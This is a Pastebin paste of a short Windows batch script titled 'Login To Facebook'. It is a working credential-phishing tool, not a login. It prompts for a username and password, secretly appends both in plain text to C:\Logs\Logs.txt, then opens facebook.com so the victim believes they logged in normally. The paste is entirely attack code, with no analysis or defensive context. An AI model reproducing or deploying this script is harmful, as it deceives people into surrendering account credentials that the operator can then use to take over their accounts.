Advertisement
Guest User

Untitled

a guest
Nov 21st, 2018
169
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. @echo off
  2. title Login To Facebook
  3. color a
  4.  
  5. echo Please Type Your Username Adress And Password.
  6. echo.
  7. set /p u=Username:
  8. set /p p=Password:
  9. echo Username="%u%" Password="%p%" >> C:\Logs\Logs.txt
  10. start www.facebook.com
  11. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement